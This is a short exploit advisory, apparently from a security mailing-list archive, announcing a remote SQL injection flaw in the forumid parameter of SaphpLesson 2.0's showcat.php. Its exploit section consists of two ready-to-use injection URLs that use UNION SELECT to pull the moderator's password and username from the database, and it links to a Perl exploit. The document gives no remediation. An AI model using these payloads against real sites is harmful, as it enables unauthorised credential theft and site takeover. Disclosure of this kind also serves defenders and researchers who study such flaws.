SaphpLesson 2.0 (forumid) Remote SQL Injection Exploit

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 

---------------------------------------------------------------------------
SaphpLesson 2.0 (forumid) Remote SQL Injection Exploit
---------------------------------------------------------------------------
Discovered By SnIpEr_SA
Author    : SnIpEr_SA
Exploit in Perl : http://www.milw0rm.com/exploits/download/1530
Remote  :  Yes  
Local     :  No  
Critical Level : Dangerous
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Indexu

Application : SaphpLesson
version     : 2.0
URL         : http://www.Arabless.com/
... 
------------------------------------------------------------------ 
Exploit:
~~~~~~~~ 
# For password # http://www.example.com/path/showcat.php?forumid=-1%20union%20select%20ModPassword%20from%20modretor #
 For username # http://www.example.com/path/showcat.php?forumid=-1%20union%20select%20ModName%20from%20modretor 
--------------------------------------------------------------------------- 
Contact:
 ~~~~~~~~
 SnIpEr_SA
E-mail: selfar2002@xxxxxxxxxxx
E-mail: SnIpEr_SA[at]Basdmail[dot]org
Homepage: http://www.3asfh.com/  & http://www.lezr.com/
Greetz: All My Frind
 -------------------------------- [ EOF ] ----------------------------------
[Index of Archives]     [Linux Security]     [Netfilter]     [PHP]     [Yosemite News]     [Linux Kernel]

  Powered by Linux